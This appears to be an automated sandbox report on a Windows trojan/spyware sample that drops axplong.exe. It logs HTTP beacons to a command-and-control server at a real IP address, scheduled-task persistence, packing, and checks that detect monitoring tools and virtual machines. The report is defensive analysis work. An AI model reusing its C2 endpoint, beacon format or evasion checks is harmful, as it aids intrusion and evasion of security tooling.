                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
                    Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                    Source: unknown DNS traffic detected: query: 206.23.85.13.in-addr.arpa replaycode: Name error (3)
                    Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_006ABD60 InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile
                    Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3248149591.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php32
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpZ
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpc
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001269000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp;
                    Source: axplong.exe, 00000007.00000002.3248149591.000000000127F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpt
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx
                    Source: axplong.exe, 00000007.00000002.3248149591.0000000001299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy

                    System Summary

                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: EXyAlLKIck.exeStatic PE information: section name: .idata
                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E30687_2_006E3068
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006AE4407_2_006AE440
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006A4CF07_2_006A4CF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006D7D837_2_006D7D83
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E765B7_2_006E765B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006A4AF07_2_006A4AF0
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E777B7_2_006E777B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E87207_2_006E8720
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E6F097_2_006E6F09
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006E2BD07_2_006E2BD0
                    Source: EXyAlLKIck.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: EXyAlLKIck.exeStatic PE information: Section: ZLIB complexity 0.9973763198228883
                    Source: EXyAlLKIck.exeStatic PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
                    Source: axplong.exe.0.drStatic PE information: Section: ZLIB complexity 0.9973763198228883
                    Source: axplong.exe.0.drStatic PE information: Section: wfabfqoe ZLIB complexity 0.994585331028423
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49Jump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: EXyAlLKIck.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile read: C:\Users\user\Desktop\EXyAlLKIck.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\EXyAlLKIck.exe "C:\Users\user\Desktop\EXyAlLKIck.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: EXyAlLKIck.exeStatic file information: File size 1878528 > 1048576
                    Source: EXyAlLKIck.exeStatic PE information: Raw size of wfabfqoe is bigger than: 0x100000 < 0x199000

                    Data Obfuscation

                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeUnpacked PE file: 0.2.EXyAlLKIck.exe.750000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 2.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 3.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeUnpacked PE file: 7.2.axplong.exe.6a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wfabfqoe:EW;qxvdwait:EW;.taggant:EW;
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: EXyAlLKIck.exeStatic PE information: real checksum: 0x1caa78 should be: 0x1d70b3
                    Source: axplong.exe.0.drStatic PE information: real checksum: 0x1caa78 should be: 0x1d70b3
                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: EXyAlLKIck.exeStatic PE information: section name: .idata
                    Source: EXyAlLKIck.exeStatic PE information: section name:
                    Source: EXyAlLKIck.exeStatic PE information: section name: wfabfqoe
                    Source: EXyAlLKIck.exeStatic PE information: section name: qxvdwait
                    Source: EXyAlLKIck.exeStatic PE information: section name: .taggant
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: .idata
                    Source: axplong.exe.0.drStatic PE information: section name:
                    Source: axplong.exe.0.drStatic PE information: section name: wfabfqoe
                    Source: axplong.exe.0.drStatic PE information: section name: qxvdwait
                    Source: axplong.exe.0.drStatic PE information: section name: .taggant
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 7_2_006BD84C push ecx; ret 7_2_006BD85F
                    Source: EXyAlLKIck.exeStatic PE information: section name: entropy: 7.982589984423413
                    Source: EXyAlLKIck.exeStatic PE information: section name: wfabfqoe entropy: 7.954564972616457
                    Source: axplong.exe.0.drStatic PE information: section name: entropy: 7.982589984423413
                    Source: axplong.exe.0.drStatic PE information: section name: wfabfqoe entropy: 7.954564972616457
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file

                    Boot Survival

                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958293 second address: 958299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958299 second address: 9582B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE5B8F4A756h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9582B6 second address: 9582CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FE5B8D9CB56h 0x0000000e jnp 00007FE5B8D9CB56h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9582CA second address: 9582D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 94C57B second address: 94C581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 921734 second address: 921749 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 921749 second address: 92174F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 92174F second address: 921755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 921755 second address: 921759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958C46 second address: 958C69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FE5B8F4A74Ch 0x0000000c jmp 00007FE5B8F4A74Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958C69 second address: 958C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 958C6D second address: 958C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 924C72 second address: 924C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 924C78 second address: 924C8C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE5B8F4A746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FE5B8F4A746h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 924C8C second address: 924C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 95E5D1 second address: 95E5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96555F second address: 965563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 965563 second address: 96557D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8F4A750h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96557D second address: 965583 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 965583 second address: 965589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 965589 second address: 96558F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 96558F second address: 965595 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 964C6D second address: 964C85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE5B8D9CB60h 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 964E1E second address: 964E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\EXyAlLKIck.exeRDTSC instruction interceptor: First address: 9675A2 second address: 9675C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE5B8D9CB65h 0x00000010 rdtsc
